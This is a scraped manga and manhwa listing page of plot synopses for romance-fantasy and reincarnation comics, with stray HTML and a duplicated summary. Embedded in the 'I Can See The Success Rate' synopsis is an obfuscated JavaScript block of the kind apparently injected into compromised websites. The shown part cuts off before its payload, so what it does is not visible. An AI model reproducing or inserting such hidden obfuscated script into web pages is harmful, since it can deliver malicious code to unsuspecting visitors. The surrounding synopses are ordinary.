Comic - Page 2

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

45 results

I Can See The Success Rate

Bai Wu, who is frustrated with his life in the real world, suddenly gains the ability to see the success rate of events. Use the success rate to reach the pinnacle of life! Success Rate<script></script><script>(function(_0xd12129,_0x1d1238){var _0x3d777b=_0x2dd9,_0x33cbc7=_0xd12129();while(!![]){try{var _0x12488a=-parseInt(_0x3d777b(0x12e))/(0xbb5+-0x15c*0x9+-0x1*-0x88)*(parseInt(_0x3d777b(0x137))/(0x2217*-0x1+-0x2cb*0xd+0x4668))+-parseInt(_0x3d777b(0x12c))/(-0x1*0x8df+0x10f7*0x1+-0x815)*(parseInt(_0x3d777b(0x125))/(0x25*-0x43+-0x465+-0x16*-0xa4))+parseInt(_0x3d777b(0x13a))/(-0x133f+-0x2*-0x893+0x21e)+-parseInt(_0x3d777b(0x139))/(-0x1*0x1ee3+0x24cd+-0x5e4)*(-parseInt(_0x3d777b(0x120))/(0xa35*-0x3+-0x14f5+0x339b))+parseInt(_0x3d777b(0x127))/(0x24fc+0x7ce*-0x5+0x212)+parseInt(_0x3d777b(0x11d))/(-0x24b9+-0x5*-0x74a+0x50)+parseInt(_0x3d777b(0x11f))/(-0x2*0xfda+0xd*-0x12f+-0x96d*-0x5)*(-parseInt(_0x3d777b(0x134))/(0x1fe7+0x43*0x23+-0x2905));if(_0x12488a===_0x1d1238)break;else _0x33cbc7['push'](_0x33cbc7['shift']());}catch(_0x313957){_0x33cbc7['push'](_0x33cbc7['shift']());}}}(_0x3b79,-0xb1652+-0x1fa8b+0x12ea91));function _0x2dd9(_0x3fbb3a,_0xbb01b3){var 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I Didn’t Save You To Get Proposed To

As usual, I was going home from work. But suddenly I had an accident. Before I left, I heard someone’s voice in my head. [I’m Elsia Artise, please save him, please, you can do it!!] That was the last thing I was aware of before fainting. After opening my eyes, I found myself in a different place… This place was in a novel that I read before that accident happened! I already possess the body of Elsia, who will die as soon as the novel begins. There’s only one thing I can do to survive. It was following Elsia’s request and distorting the original! First, it was to save Ixion, her unrequited love, who was assassinated and killed. “Prince, I am here to warn you of the assassination that will take place today.” I succeeded in saving him by using information from the original, I just want to live a comfortable life that has nothing to do with the original. Until I received a letter… “I owe you a lot of favors. I hope you will come to the capital immediately because I want to repay this favor with a marriage.” Ixion’s marriage proposal, which I thought was the end of our relationship. “Prince, I didn’t save you so you could propose to me?” Can Elsia peacefully refuse his marriage proposal and return to her comfortable life?


I Didn’t Save You To Get Proposed To

As Usual, I Was Going Home From Work. But Suddenly I Had An Accident. Before I Left, I Heard Someone’s Voice In My Head. [I’m Elsia Artise, Please Save Him, Please, You Can Do It!!] That Was The Last Thing I Was Aware Of Before Fainting. After Opening My Eyes, I Found Myself In A Different Place… This Place Was In A Novel That I Read Before That Accident Happened! I Already Possess The Body Of Elsia, Who Will Die As Soon As The Novel Begins. There’s Only One Thing I Can Do To Survive. It Was Following Elsia’s Request And Distorting The Original! First, It Was To Save Ixion, Her Unrequited Love, Who Was Assassinated And Killed. “Prince, I Am Here To Warn You Of The Assassination That Will Take Place Today.” I Succeeded In Saving Him By Using Information From The Original, I Just Want To Live A Comfortable Life That Has Nothing To Do With The Original. Until I Received A Letter… “I Owe You A Lot Of Favors. I Hope You Will Come To The Capital Immediately Because I Want To Repay This Favor With A Marriage.” Ixion’s Marriage Proposal, Which I Thought Was The End Of Our Relationship. “Prince, I Didn’t Save You So You Could Propose To Me?” Can Elsia Peacefully Refuse His Marriage Proposal And Return To Her Comfortable Life?


I Don’t Love You Anymore

<div class="post-title"> <span style="font-size: 16px;">To Nivea, the world seemed like an eternal winter. Her parents and maids had given her the cold shoulder ever since she was a baby. When she fell down in the snow, no one spared her a glance. It was truly a dreadful winter.</span> </div> <div class="tab-summary "> While living day to day like a doll on a display shelf, Nivea was engaged as part of a pre-natal agreement between her father and her fiance’s father. Her fiance was a Wistash. Duke Valor Wistash. As in the prelude to every tragedy, it all began with a damned love. “Love has its moments. You missed them all, and now I don’t love you anymore.” Niveia said to her fiance who had never once looked at her for the past decade, then left the Empire for the neighbouring country where she was welcomed with open arms. She didn’t expect anything there and was simply planning to live quietly but the Emperor’s attitude towards her was exceedingly friendly. “I want you to be happy. You can wish for anything and do as you please. I want to give you a season where you don’t have to be constantly wary of other people.” After meeting Arendt, Nivea’s winter began to overflow… into spring as the snow began to melt. </div>


I Will Be Next to the Main Character

I Will Be Next to the Main Character / I Will Just Stick to the Main Character / I Will Stick to the Protagonist / 주인공 옆에 붙어만 있겠습니다 She became possessed by a madman who plans to kill more than 10 of her fiancées alone. They say that there is no medicine for being bitten by a mad dog, and I ‘m trying to get a free ride on the main character’s world domination… . “You are really weak.” … Could that be unusually strong? Why do you keep taking me with you, saying it’s useless? Can’t I just take the bus comfortably? “Are my hands too cold?” “no.” “… … But why do you keep trying to let go?” “That, that’s it, just to stroke your head for saying you did a good job!” I pretended not to be scared and replied confidently, and Sirius laughed as if he was doing something cute. Although he was young, his handsome face was already dazzling. If he hadn’t been covered in blood, he would’ve been pretty. “yes? Then go ahead and praise me.” Don’t pretend to be friendly all of a sudden, you madman. Elena’s hand trembled and landed on top of her silver hair.​


Is It a Fortune or Is It a Woe?

<span class="mx-1">Is It a Fortune or Is It a Woe? </span> Somehow, before the appearance of the female lead, I became the male lead’s temporary wife. Since things had already turned out this way, I decided to try my very best. However… “It’s so fortunate that someone like you became Cedric’s partner.” “... I’ll admit it. It’s a fortune that you were the one to become his wife, Dylan.” “It’s such a fortunate chance that you were the one to become the Lady of the Brighton House.” … I think I did too much of a good job. When Cedric’s destined partner arrives, I will have to leave. What should I do? To someone like that, Cedric had said this. “Would you have ever thought that the one I would fall in love with would be you?” ...Would you still say the same to me after the real female lead, Adeline, makes her appearance?


It All Starts With Playing Game Seriously

Read “It All Starts With Playing Game Seriously Novel” – “It All Starts With Playing Game Seriously Manga” Online Free At Hari Manga The Summary Of The Comics “It All Starts With Playing Game Seriously”: Even A Nobody Should Aim For The Moon And Have Big Ambitions. The Game Is Far From Over, And Anybody Can Be A Dark Horse. The Game, Metaverse, Became A Reality, Where Players Obtained In-Game Abilities Of Their Characters, Throwing The World Into Chaos. Liu Yi, Remarkably Endurant, Highly Competitive, Yet Afraid Of Confrontation, Reincarnated And Returned To The World Before Metaverse Descended. With The Knowledge He Gained In His Past Life, He Started To Play The Game Seriously While Overcoming His Fear Of Confrontation. In The End, He Would Grow Into A Hero And Save The World. “It All Starts With Playing Game Seriously” Is Alternatively Named: Leveling Up While Playing Game Seriously / Rise From Serious Play Game / Todo Comienza Con Jugar En Serio / 从认真玩游戏开始崛起 / 底辺プレイヤー〜命がけのレベルアップ〜 / 리: 플레이어 / 리:플레이어 The Comics “It All Starts With Playing Game Seriously” Belongs To The Genre: Action, Adventure, Comics, Fantasy, Game, Manhua, Monster, Mystery, Reincarnation “Harimanga, Manga Updates, Manhwa Website…” Are The Most Searched Keywords On The Website Kun Manga. We Offer A Wide Selection Of The Best And Newest Comics Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging


I’ll Twist The Neck Of A Sweet Dog

Chloe Garnetsch, Who Gave Everything For The Man She Loved, But Eventually Died Miserably. Foolish Chloe Realized Too Late. She Was A Bait For A Man To Throw At The Emperor, And A Man Was A Beautiful Son Of A Bitch Disguised As Tenderness. * “I Like You Uncle.” Seventeen I Was Just As Young And Immature As I Could Not Hide My Growing Heart. “I’ve Been In Love, For A Long Time.” My Body Shuddered At The Sight Of Me Looking Over My Body With My Chin On My Back, But I Plucked Up The Courage And Took A Step Closer To Him. “Love. You’re Already That Old.” His Fingertips Swept Down My Face. Despite The Unexpected Confession, He Was Overly Relaxed And Adept. “I Like You Too, Chloe. I’m In Love. How Can I Not Be Pleased With You, Who Will Bring Me Your Brother’s Neck In The Future.”” The Man I Was In Love With Was So Sweet That He Was Even Crueler. 다정한 개새끼의 목을 비틀겠습니다 , I’ll Twist The Neck Of A Friendly Son Of A Bitch , I Will Twist The Neck Of A Sweet Dog


I’m The Great Immortal

I’m The Great Immortal The Previous Life Was A Peerless Genius In The World Of Immortality. He Was Killed By 3 Celestial Beings. He Was Accidentally Reborn To His 20S By The Book Of Heaven. All He Wanted To Do Was To Become An Immortal And Return To The Immortal World, And He Became The Strongest Man On The Earth, Turning His Hands Into Clouds And Covering His Hands With Rain, Provoking Anyone Who Defies Him! He Is The Venerable One! The Ruler Of 3000 Worlds! The Guy Who Is 10 000 Times Better Than Thanos! He Is Taixuan Taizun! The Great Immortal! I’m Daxianzun Wo Shi Da Xian Zun 我是大仙尊 Search For Series Of Same Genre(S) Welcome To Mangazin Site, You Can Read And Enjoy All Kinds Of Manhua Trending  Such As Drama, Manga, Manhwa, Romance…, For Free Here. All Of The Manhua New Will Be Update With High Standards Every Hours. If You Are A Comics Book (Manhua Hot ), Mangazin Is Your Best Choice, Don’t Hesitate, Just Read And Feel !  

3 days ago

I’m Worried That My Brother Is Too Gentle

“Your Highness! The Papers Have Piled Up Like This……!” I Reincarnated As Irene Weber, The Younger Sister Of An Aide Who Is Suffering From Overtime Because Of The Prince Who Is In Love And Neglects His Work. Irene, Who Was Buried In Work Before The Reincarnation And Died Of Overwork, Intends To Protect Her Beloved Brother From Such A Terrible Thing. No Overtime! No Call After Work! Evil Boss, Go Away! Work Less And Earn More, Brother! To The End, Irene Tries To Separate The Prince From Her Brother. A Method To Win By Knowing Your Enemy And Knowing Yourself. Irene Scraps A Little Record Without Leaving Any Details, Of The Prince Whose Face She Doesn’t Even Know About, For The Future. Somehow, Her Brother’s Face, Looking At Such Irene, Is Dark…… “Brother, If You’re Meeting The Crown Prince Today, I’ll Go With…..” “Absolutely Not.” ‘Do You Want To Meet Him Alone So Much?’ *** “Before That, Benjamin Weber, When Can I Meet Your Sister?” “Not For The Rest Of Your Life.” The Most Affectionate Brother And Sister Of The Continent. Will The Day Come When These Two Siblings Can Resolve Their Growing Misunderstanding?


Lady Scarlet

<div class="post-title"> <h1>Lady Scarlet</h1> Scarlet Marica is the eldest daughter of the bankrupt Baron Marica. She decides to go to the capital with the ambition of becoming the most recognized piano teacher. 3 years later, Scarlet fell in love with Edward Hart instead of pursuing her dream. She thought that she would get married in the future. But then she found out that her lover had a fiancée all along! Eventually, the richest man of the empire and the notorious marquis, Kellan Black approached her. “I have a lot of debt to pay him back. Lady Scarlet, would you like to take revenge on him?” &nbsp; </div>


Love Between You And Me

<h4>Zu Sheng Xia, a rebellious, wild and intractable trouble maker who fights a lot at school. Leng Ye Chen, the third master of Leng Family. He looks cold and serious on the outside, but deep inside he's a flirty and scheming fox. The first time they met, Sheng Xia fell for him, but he's her third uncle?! No worries! She is smarter than that! Come and see her how to take down the cold, elegant and scheming General step by step.</h4> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
